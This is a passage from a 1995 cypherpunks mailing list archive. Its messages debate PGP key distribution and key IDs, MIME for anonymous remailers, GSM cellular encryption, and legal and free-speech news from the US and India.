standard does.

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Date: Fri, 10 Feb 95 12:48:05 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <9502101958.AA15039@snark.imsi.com>
Message-ID: <9502102047.AA25106@hibbs.vcu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger originally said the following...
> 
> 
> I'll also note, yet again, that unless PGP quits this bad practice of
> identifying counterparties only by a number, it is NOT going to be
> universally deployed. Counterparties need to be identified by a name
> that can be looked up in the DNS -- meaning "joe@foo.com" rather than
> some key ident number.

Doesn't having some kind of central record of keys go against
the principle of PGP?  Unless you're just talking about having
a name attached to each key, but not exactly a DNS for key
id's...  I'll admit I'm a little confused.

-----------------------------------------------------------------------------
Greg Morgan <mac5tgm@hibbs.vcu.edu>    | "I dunno Brain, me and Pipi
Mail me for PGP Key: 0xE0D222A9        |  Longstocking?  I mean what would
Key Fingerprint : 2430 BAA4 1EE4 AA2F  |  the children look like?" - Pinki
                  3B76 3516 3DEF 5529  |
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 10 Feb 95 15:54:49 PST
To: mab@crypto.com
Subject: why pgp sucks
Message-ID: <199502102348.AA09436@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----


Matt Blaze, quoting Greg Morgan, wrote:

> >Doesn't having some kind of central record of keys go against
> >the principle of PGP?  

> The only "principle" of which I'm aware (and particularly interested
> in supporting) is that of having widely fielded, useful and strong
> privacy and authentication tools that work properly and transparently.

I think the centralization/decentralization confusion comes from PGP's
decentralized approach to key generation and authentication, which has
been hailed as a good thing. As long as folks can generate their own
keys, sign their friends' keys, and upload their keys to servers at 
their own discretion, I can't see what would make a centralized or
standardized distribution method harmful.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzv7I33YhjZY3fMNAQGVbAP/Sm8rXLFDXU4te0mBEhmi6CaAbvHTPqRZ
kce6+auO1T/3ypEi0c0D2QCJ7mS3Xx/g/n42mHhJHzt5ClhuHlhDRyjOV2rGBpWX
OElxuVFpcSIlUnnQ2cvju9k8cDtHnXN+crmmjUXxvqmUB371eyOZ6E140nxfxo2/
JqWBXLFPvpI=
=AL3C
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 13:00:57 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: MIME based remailing commands
In-Reply-To: <199502090425.UAA24521@largo.remailer.net>
Message-ID: <9502102057.AA11903@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 8 Feb 1995 20:25:32 -0800
    From: Eric Hughes <eric@remailer.net>
    
    You say MIME, and you've not completely specified the data format,
    but rather constrained it in a way that most everybody basically
    agrees with, including me.

Could one of the MIME supporters (I guess that would be `most
everybody') explain why anything more than a To: header and an
encrypted block is desireable for the in-the-clear message?

Specifically, why is it desireable to broadcast additional information
about a message for which privacy is a primary concern?

--
Rick Busdiecker <rfb@lehman.com>      Please do not send electronic junk mail!
  Lehman Brothers Inc.
  3 World Financial Center  "The more laws and order are made prominent, the
  New York, NY  10285-1100   more thieves and robbers there will be." --Lao Tzu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 10 Feb 95 13:00:01 PST
To: Hal <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <18386.792449215.1@nsb.fv.com>
Message-ID: <0jCxBn=0Eyt5AxShYL@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 10-Feb-95 Re: MIME based remailing co.. Rick
Busdiecker@lehman.c (1667)

> If you start your header name with X-, then you are conforming that
> gross, ugly atrocity that is MIME.  And yet, by using headers rather
> than TGUATIM, you help to preserve sanity and avoid that vast majority
> of MIME slime.

Well, I have no idea why you think that MIME is an "atrocity" or
"slime", but it is perfectly clear that you have no idea what it
actually *is*, since "X-" headers have nothing whatsoever to do with
MIME.  The "X-" headers are defined by RFC 822, which has been the
standard for Internet mail formats since 1982.

Perhaps you should learn what MIME is before you embarass yourself
further.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 12:59:12 PST
To: Eric Hollander <hh@xcf.Berkeley.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <9502102058.AA07955@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> if i use a command like
> 
> 	pgp filename

The problem is that you are using the wrong command....

> it will automatically figure out the right thing to do with the file.  if
> it's encrypted, and i have the key, it will attempt to decrypt it.  if it
> contains keys, it will ask if i want to add them to my keyring.  if it's
> signed, it checks the signature.

This is the correct behavior of "pgp filename".  If you want other
behavior, you should tell PGP how you want it to behave.

> if i'm trying to write a program to automatically process incoming mail (for
> instance, to see if it's encrypted with a specific key), i certainly don't
> want to have the possibility of people being able to add garbage to my
> keyring just by mailing it to me.

A very noble effort, combining PGP with mailers.  Btw: When you run
"pgp filename" and filename contains public keys, it will ask you
before it adds them to your keyring!

You can use "pgp -d" to force it to do a decryption (although you
cannot specify which key to use for the decryption; it will choose any
of the keys on your secret keyring).

> is there a way of using pgp in a diagnostic mode, to just inform me of what
> the file contains (is it signed and/or encrypted, from who and to whom?),
> without processing it, and without interaction, and without messing around
> with the keyring?  has anyone written some scripts to do this kind of thing?

Well, I'm not exactly sure what you want.  You can give PGP no
password and it will tell you to whom a message is encrypted.  You can
call pgp -ka and it will _only_ add keys (and complain if you are
given anything else).  There is no way to ask PGP "what kind of
message is this"; that is sort of what the ASCII ARMOR header is for.

> or should i just wait until some of the groups working on the other
> encryption software get it out?

No, you should, at this point, consider working around the problems in
the monolithic PGP, until a more modular library is available, to
which multiple end programs can be built to do multiple little tasks,
as Matt explained.

Does this help?

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Fri, 10 Feb 95 13:02:58 PST
To: Name Withheld <nobody@tower.techwood.org>
Subject: Re: Coming to a newsserver near you alt.defeat.s314
In-Reply-To: <199502090627.WAA01928@tower.techwood.org>
Message-ID: <9502102101.AA11999@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


    Date: Wed, 8 Feb 1995 22:27:59 -0800
    From: Name Withheld <nobody@tower.techwood.org>

    Psychic Flash...This group will be up on auto-subscribing news server's
    VERY soon.

It was available via CMU news servers quite some time ago.  Haven't
checked recently, but I would assume that it still is.

			Rick




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 13:10:58 PST
To: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102047.AA25106@hibbs.vcu.edu>
Message-ID: <9502102110.AA07984@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Doesn't having some kind of central record of keys go against
> the principle of PGP?  Unless you're just talking about having
> a name attached to each key, but not exactly a DNS for key
> id's...  I'll admit I'm a little confused.

Not at all.

The point is to have a centralized, distributed key distribution
mechanism, similar in concept to the PGP Public Keyservers, but which
scale much much better.  The concept is similar to a DNS of PGP keys
(think of the DNS model, not the DNS implementation) where you have
keys distributed based upon site.  For example, MIT could server MIT's
keys, and CMU would server CMU's keys.

This does not go against PGP in any way.  In fact, it augments PGP
wonderfully.  How else would we be able to have a world-wide white
pages of PGP Public Keys?

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:14:00 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502102043.AA11506@cfdevx1.lehman.com>
Message-ID: <9502102113.AA15560@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker says:
>     What is it precisely that you might want to encapsulate that MIME
>     can't encapsulate?
> 
> And in what way does MIME encapsulation aid in the privacy goals of
> remailing?

With the security multiparts MIME standard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:17:31 PST
To: Rick Busdiecker <rfb@lehman.com>
Subject: Re: MIME based remailing commands
In-Reply-To: <9502102057.AA11903@cfdevx1.lehman.com>
Message-ID: <9502102116.AA15570@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rick Busdiecker says:
> Could one of the MIME supporters (I guess that would be `most
> everybody') explain why anything more than a To: header and an
> encrypted block is desireable for the in-the-clear message?
> 
> Specifically, why is it desireable to broadcast additional information
> about a message for which privacy is a primary concern?

No one said that it was desirable to do so, and MIME does not force
you to do so.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:19:27 PST
To: Derek Atkins <warlord@mit.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102110.AA07984@josquin.media.mit.edu>
Message-ID: <9502102118.AA15581@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins says:
> The point is to have a centralized, distributed key distribution
> mechanism, similar in concept to the PGP Public Keyservers, but which
> scale much much better.  The concept is similar to a DNS of PGP keys
> (think of the DNS model, not the DNS implementation) where you have
> keys distributed based upon site.  For example, MIT could server MIT's
> keys, and CMU would server CMU's keys.
> 
> This does not go against PGP in any way.  In fact, it augments PGP
> wonderfully.  How else would we be able to have a world-wide white
> pages of PGP Public Keys?

Unfortunately, the current PGP practice of using only numeric key-ids
in message packets makes it hard to do this -- sigh. I hope that
the next version of PGP changes this.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 10 Feb 95 16:29:58 PST
To: cypherpunks@toad.com
Subject: Re: why pgp sucks
In-Reply-To: <199502102233.RAA02974@crypto.com>
Message-ID: <199502110029.QAA21514@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze <mab@crypto.com> writes:
>More seriously, the problem that Perry brought up is that it's hard
>to deploy any kind of scaleable key distribution infrastructure
>that works with PGP (as it currently exists - and yes, I realize
>there are work-arounds for some specific situations).

Could you have a distributed database where you lookup by key ID and get
a key?  Or is there a constraint that the key distribution infrastructure has
to be part of the DNS?

I could see a set of key servers where one deals with all keys that start
with 0x00, the next has all keys which start with 0x01, etc.  This makes
it easy to know which server to go to in order to look up a given key ID.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lee.noon@mgmtsys.com (Lee Noon)
Date: Sat, 11 Feb 95 07:48:51 PST
To: cypherpunks@toad.com
Subject: Re: Not necessarily crypt
Message-ID: <90.84391.1@mgmtsys.com>
MIME-Version: 1.0
Content-Type: text/plain


  
in message-ID: 
<Pine.LNX.3.91.950209105922.8309A-100000@chewy.wookie.net> 
slowdog@wookie.net wrote:

SG>On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:

SG>> I heard yesterday that someone in the House of Representatives proposed an
  >> amendment to the new crime bill which was soundly defeated it. Turns out t
  >> Amendment was worded exactly as the Fourht Amendment in the Bill 'o Rights
  >> Apparently many a congressman/woman has egg on their face...

SG>Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
  >text of the 4th Amendment without attributing it to be such. It was 
  >defeated. Dems then immediately took to the floor of the House accusing 
  >the Repubs of tryingto dismantle the Constitution.

     Almost all right.  The Dems did acknowledge it was the fourth 
amendment, they drummed on that fact during the debate.  What they 
failed to explain was that the amendment was not offered TO the bill 
but IN PLACE OF the bill.  Even the Republicans failed to properly 
explain this, instead saying it would "gut the bill."
     This bill is not new, people.  It codifies what has been the 
practice in two federal district courts for several years.  The boogie 
man raised most often it the "confidential informant."  The use of a 
bogus CI is illegal.  It is still illegal under this bill.
     The major problem with this bill is it does not add the penalty to 
law enforcement officers for "bad faith actions." This was proposed by 
the republicans last year and ignored by the democrats.  Tis year the 
republicans had the power to push it through and they ignored it.  
Shows how really different they are.
     The "bad faith actions" provision would have made a LEO who 
knowingly generated a search warrant, searched without one without 
probable cause, liable for criminal charges at the federal level.  In 
other words when cop A uses cop B as his evidence for a warrant, and 
cop B lies, cop B goes to jail.  If cop A knew it was a lie, cop A goes 
to jail.  If it results in a shoot out like Waco and lives are lost, he 
goes to jail on murder one charges.  This carries the death penalty for 
a federal offense.  Naturally the one outfit which opposed this the 
most was the BATF, who violates this provision as the preferred way to 
do business.
     It is now up to the senate.  Hopefully Senator Byrd can stop 
taking about his dog long enough to bring these points to the fore.

Lee

                              Lee Noon (lee.noon@mgmtsys.com)

 * 1st 2.00b #3833 * A government can't give back anything it hasn't taken first.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 10 Feb 95 13:36:08 PST
To: perry@imsi.com
Subject: Re: why pgp sucks
In-Reply-To: <9502102118.AA15581@snark.imsi.com>
Message-ID: <9502102135.AA08054@josquin.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Unfortunately, the current PGP practice of using only numeric key-ids
> in message packets makes it hard to do this -- sigh. I hope that
> the next version of PGP changes this.

I doubt PGP will change this in the near future.  That would require a
major packet format change, and would not be anywhere near backwards
compatible.  

I dont consider this to be a big problem.  If you limit key lookups in
the database to be lookup on userID only, that solves your database
problem.  As for the keyID->userID, well, this would only be required
to _verify_ a signature.  In that case, you know who sent the message
to you so you can ask them for the key.  When you want to encrypt to
someone, you already know to whom you want to encrypt, so the same
thing applies.

I don't see the problem!

-derek

PS: I should state that I know what problem you are trying to solve,
and I'm saying that there are other workarounds to get around the
problem.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 10 Feb 95 13:42:13 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502102135.AA08054@josquin.media.mit.edu>
Message-ID: <9502102141.AA15657@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins says:
> > Unfortunately, the current PGP practice of using only numeric key-ids
> > in message packets makes it hard to do this -- sigh. I hope that
> > the next version of PGP changes this.
> 
> I doubt PGP will change this in the near future.  That would require a
> major packet format change, and would not be anywhere near backwards
> compatible.  
> 
> I dont consider this to be a big problem.

I do. It means that I can't use PGP for IPSP key management -- period.

> If you limit key lookups in the database to be lookup on userID
> only, that solves your database problem.  As for the keyID->userID,
> well, this would only be required to _verify_ a signature.  In that
> case, you know who sent the message to you so you can ask them for
> the key.  When you want to encrypt to someone, you already know to
> whom you want to encrypt, so the same thing applies.
> 
> I don't see the problem!

Sorry, but I see the problem. If I want to follow an arbitrary chain
of signatures, check arbitrary signatures, etc, I'm forced to go
through kludges or worse. I don't see it as acceptable to just ask
someone for their key, either.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 10 Feb 95 13:59:19 PST
To: ethridge@netcom.com (Allen B. Ethridge) (Allen B. Ethridge)
Subject: Re: The drumbeat against anonymity (Cellphone security?)
In-Reply-To: <ab5f548601021004d020@DialupEudora>
Message-ID: <199502102157.QAA20682@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


I remember watching some of the hearings onthe DT Bill on CSPAN and seeing
the cellular industry people note that the DT Bill would make it difficult
to implement encryption/authentication measures.

Rob

> >The phone companies that are complaining about fraud have inadequately
> >arranged for security and need to adopt a mode that fixes this. Since
> >physical money can't be fed into the slots of a handheld cell phone (or
> >at least can't then be delivered to the service owner!), the solution
> >has traditionally been an account-based payment system. (Accounts can
> >also be better protected against fraud by having PINs, etc.)
> >
> 
> The technology to reduce cellular fraud, through encryption and
> authentication, is easily implementable, but for some reason neither
> the operating companies nor the manufacturers want it.
> 
> In contrast, European cellular (GSM) products do implement
> encryption and authentication (at least as far as laws allow).
> GSM mobile phones can be equipped with a slot for a card that
> identifies the subscriber.  Billing is based on the subscriber's
> identity, not the phone's.
> 
> I'd say that the problem isn't just a lack of a proper payment
> model, but also an unwillingness to provide adequate technology
> to the problem.  Of course, the GSM approach does nothing for anonymity
> or digital cash.
> 
> allen@well.sf.ca.us          It's dangerous, child, to come to conclusions
> ethridge@netcom.com          when you don't have any facts.
> my opinions are my own       Dr. Hemlock, The Eiger Sanction
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Fri, 10 Feb 95 14:29:15 PST
To: hh@xcf.Berkeley.EDU (Eric Hollander)
Subject: Re: why pgp sucks
In-Reply-To: <9502101849.AA21833@xcf.Berkeley.EDU>
Message-ID: <199502102228.RAA21755@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> if i use a command like
> 
> 	pgp filename
> 
> it will automatically figure out the right thing to do with the file.  if
> it's encrypted, and i have the key, it will attempt to decrypt it.  if it
> contains keys, it will ask if i want to add them to my keyring.  if it's
> signed, it checks the signature.
> 
> this sucks!

From whose point of view? Remember the thread about Getting things right
v. Getting the software out?

The above way is easier for most people with little computer techie
knowledge. Requiring a whole complex set of commands would mean less
PGP users.

As people get used to it and learn about the issues, key management,
etc. they'll be more willing to use a more advanced version of PGP...
at the very least, they'll eventually RTFM and realize that you actally
have more control of what it can do...

Rob

> if i'm trying to write a program to automatically process incoming mail (for
> instance, to see if it's encrypted with a specific key), i certainly don't
> want to have the possibility of people being able to add garbage to my
> keyring just by mailing it to me.

Have your program check what's in the mail before doing anything with it...?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Fri, 10 Feb 95 14:31:27 PST
To: Greg Morgan <mac5tgm@hibbs.vcu.edu>
Subject: Re: why pgp sucks
In-Reply-To: <9502102047.AA25106@hibbs.vcu.edu>
Message-ID: <199502102233.RAA02974@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>Doesn't having some kind of central record of keys go against
>the principle of PGP?  

The only "principle" of which I'm aware (and particularly interested
in supporting) is that of having widely fielded, useful and strong
privacy and authentication tools that work properly and transparently.
That means, among a great many other things, flexible protocols
and tools that support remote key distribution services.

As much as people want to believe that privacy can be reduced to
some kind of romantic struggle between the evil forces of Centralization
(PEM?) and the civilizing forces of Anarchy (PGP?), the world most
of us live in is a lot more complex than that.

More seriously, the problem that Perry brought up is that it's hard
to deploy any kind of scaleable key distribution infrastructure
that works with PGP (as it currently exists - and yes, I realize
there are work-arounds for some specific situations).  That, as well
as other shortcomings (like its fixed trust/certification model)
that work against its serious use, make it doubtful that PGP 2.x
has much long-term future as anything other than a plaything for
nerds like us.  Hopefully, PGP and other good tools will evolve to
work well on a larger scale before Microsoft has a chance to give
everyone what _it_ thinks the world needs.

(I'm not trying to attack anyone here, by the way - part of the
problem is that we're just now learning what the privacy problems
of the real world even _are_.  Experimental tools like PGP are
important as much for providing experience and exposing problems
and limitations as they are for their immediate function.  Indeed,
the fact that PGP and PEM are as useful as they are may actually
work _against_ the spread of really large-scale crypto tools; the
people who they are aimed at stay happy while the rest of the world
never finds out what it's missing.)

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Fri, 10 Feb 95 14:51:36 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: law vs technology
In-Reply-To: <199502102133.AA16472@mail.eskimo.com>
Message-ID: <199502102253.RAA10658@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:
> If you have a certain amount of time to spend on
> advancing the cause of greater personal privacy (or freedom, or
> cryptoanarchy, or whatever), can you do it better by using the
> time to learn about cryptography and develop the tools to
> protect privacy, or by convincing your government not to invade
> your privacy?  I argue that since there are many more people
> doing the former (EFF, CPSR, etc) than latter, that you'd be
> more effective if you spent the time on the former.

[Presumably you meant, "many more people doing the *latter* than *former*"]

Speaking strictly for myself, I agree. I'm relatively well-positioned to
design and produce privacy- and security-preserving protocols and programs.
OTOH, while I find politics absorbing, I don't have any special expertise or
influence. Once the legal scholars start to debate legislation, I step out
of the way.

There is, however, an awfully wide spectrum of interests and abilities 
among the subscribers to this list, from what I can tell. Plenty of people
here lack some of the requisite technical skills, but can offer significant
assistance in other ways. So I think your point applies to some people here,
but not everyone. 

I'm reminded of the controversy over the essential identity of cypherpunks.
There was interminable wrangling over who (if anyone) "owned" the list, 
whether the list and Cypherpunks were identical, etc. AFAI can tell, the list
comprises many of both run-of-the-mill privacy/security advocates (whatever 
that means) and Cypherpunks according to strict definitions as written by Tim 
and others.

As a separate issue, there are quite a few vocal opponents of groups such as
EFF on the list. I've no idea whether there's a silent majority ;) of lurkers
who fully support EFF et al., but I suspect a sizable chunk of the list
population disagrees that there are many people really fighting invasive govt.
action.

-L. Futplex McCarthy [seeking summer work, with a background in theoretical
                      computer science; private email inquiries welcomed]



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 10 Feb 95 18:08:13 PST
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: why pgp sucks
In-Reply-To: <9502102110.AA07984@josquin.media.mit.edu>
Message-ID: <Pine.3.89.9502101709.A4566-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Feb 1995, Derek Atkins wrote:
> The point is to have a centralized, distributed key distribution
> mechanism, similar in concept to the PGP Public Keyservers, but which
> scale much much better.i

We already have a centralized, for profit, key distribution system.

http://ww.four11.com/InfoServices.html


If they make money off it, there will be more of them, they
will provide better service, and it will in due course
become a distributed key distribution system.

Digression:

I notice that it is possible to have thread titled 
"Why PGP sucks" without Holy Warriors leaping into 
the fray.

This is a marked contrast with certain other topics. 

Possibly the level of heat is inversely proportional
to the level of knowledge.  (I.e. it is safe to have
such a thread title because in this list we have
many people with considerable knowledge of several
different crypto systems, and who have spent 
considerable thought on the various possibilities.)


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Harvey <warrior@infinet.com>
Date: Fri, 10 Feb 95 15:22:12 PST
To: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Subject: Re: Laws, Feds, & the Internet
In-Reply-To: <199502102211.OAA22129@mail.igc.apc.org>
Message-ID: <Pine.3.89.9502101831.B22980-0100000@rigel>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 10 Feb 1995, Richard F. Dutcher wrote:

> 
> The following was in today's San Francisco Chronicle.  BTW, quoting 
> the entire article as I have done is probably a violation of "fair 
> use" - but de minimis ...
> 
> All under *current* law, folks.
> 
> [hmmm -- encryption doesn't do much for exhibitionists and 
> braggarts, does it?  ;-]
> 
> ==============================
[Article Deleted for the sake of Brevity]

Now mind you, this kind of writing is demented, however, what ever
happened to fiction, free speech and such.  At this rate, Steven Spielberg
should be in jail as well.  I thought you had to prove intent, the saying
something or writing it is not bad as long as you didn't have the intent
or present capability to carry out such.  BTW, I like all of Steven
Spielberg's writings and movies, and now HB830 from Oregon rears its head
and fangs.  Did this guy intend to threaten or was it fiction?  How would
they even know? 

Next thing you know they will limit all free speech.

Bummer.

dh
___
            /\  PGP the Cutting Edge of Privacy.
/vvvvvvvvvvvv \-----------------------------------\
| WARRIOR   (  |     PGP Key Id 0XF4D9F5C5          > Magnus Frater Videt Tu
`^^^^^^^^^^^^ /===================================/
            \/  Finger for PGP 2.6.2 public Key.

      PGP Fingerprint 76 6F 4B 56 B1 AC 05 FE  BE 39 9D CC 18 E4 F6 68
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
| Dave M. Harvey                                       warrior@infinet.com|
| PO Box 151311              	            dharvey@freenet.columbus.oh.us|
| Columbus, OH 43215-8311    	               fm063@cleveland.freenet.edu|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 10 Feb 95 06:56:02 PST
To: cypherpunks@toad.com
Subject: GSM and cellular crypto
Message-ID: <gate.og1B1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Richard Parrett (?) wrote:
> GSM uses less than strong encryption, by the way. I forget the
> technical details, but it is of the level that governments can
> fairly readily crack, but beyond the reach of most private
> organisations. (So no more 'Squidgy-gate'). It would, however,
> be quite feasible to add additional second stage encryption
> to phones (since the dataflow is digital point-point). I wonder
> if Nokia, a Finnish company well outside the scope of COCOM,
> might offer a feature like this.

All operaters of cellular networks in India are to use GSM, and Nokia has
been running an enormous ad campaign, it is very likely to be the market
leader in instruments. I don't know about any encryption provided, though.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Fri, 10 Feb 95 06:54:56 PST
To: cypherpunks@toad.com
Subject: Indian Supreme Court ends state control of the airwaves
Message-ID: <gate.J12B1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



The Indian Supreme Court yesterday (9th February, 1995) directed the 
government to create an independent autonomous regulatory body for the 
airwaves (like the US FCC) and end the state monopoly on broadcasting and 
satellite uplinks.

The judges took an interesting position that the "GREATER IMPACT" OF 
ELECTRONIC MEDIA and its "wider range of circulation of information" as 
opposed to the press, CANNOT BE USED TO RESTRICT or deny THE RIGHT TO FREE 
EXPRESSION. This may have important consequences, for all over the world, 
including in the US and India, the electronic media is denied freedoms 
allowed to the press with the excuse that it's somehow different.

The three-judge bench, comprising of Justices PB Sawant, S Mohan and BP Jeevan
Reddy, made the ruling after an government appeal against a previous ruling 
by the Calcutta High Court. The Calcutta High Court had earlier upheld the 
right to telecast as fundamental, which would theoretically prevent any 
regulation or censorship whatsoever. The consensual Supreme Court judgement,
while denying the government's power of monopoly, upheld its right to subject 
the electronic media to regulation and censorship. 

However, Justice Reddy, in his separate ruling did not mention censorship.
He pointed out that the century-old Indian Telegraph Act of 1885, which has
been ingeniously extrapolated to support the government's monopoly over 
electronic media and right to 'licence' data networks, was "wholly inadequate
and unsuited for" electronic media, and said that Parliament should enact
new laws to govern such media.

Unfortunately the Supreme Court has no powers to legislate, and new laws have
a habit (as seen with the Digital Telephony Bill in the US) of increasing,
rather than decreasing, government authority. The explicit statement that
the electronic media should not be more restricted than the press will, 
hopefully, prevent that.

The legal battle started with the Doordarshan, the state TV monopoly, 
objecting to the Cricket Association of Bengal's contract with Trans World
International granting the latter worldwide broadcasting rights to a cricket
tournament. Doordarshan used the 1885 Act to prevent TWI from uplinking to
satellite, till the courts intervened.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Fri, 10 Feb 95 20:02:39 PST
To: "Richard F. Dutcher" <warrior@infinet.com>
Subject: Re: Laws, Feds, & the Internet
Message-ID: <199502110403.UAA12629@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Fri, 10 Feb 1995 18:17:55 -0500 (EST)
> From:          Dave Harvey <warrior@infinet.com>
> Subject:       Re: Laws, Feds, & the Internet
> To:            "Richard F. Dutcher" <rfdutcher@igc.apc.org>
> Cc:            cypherpunks@toad.com

> On Fri, 10 Feb 1995, Richard F. Dutcher wrote:
> 
> > 
> > The following was in today's San Francisco Chronicle.  BTW, quoting 
> > the entire article as I have done is probably a violation of "fair 
> > use" - but de minimis ...
> > 
> > All under *current* law, folks.
> > 
> > [hmmm -- encryption doesn't do much for exhibitionists and 
> > braggarts, does it?  ;-]
> > 
> > ==============================
> [Article Deleted for the sake of Brevity]
> 

And David Harvey wrote:

> Now mind you, this kind of writing is demented, however, what ever
> happened to fiction, free speech and such.  At this rate, Steven Spielberg
> should be in jail as well.  I thought you had to prove intent, the saying
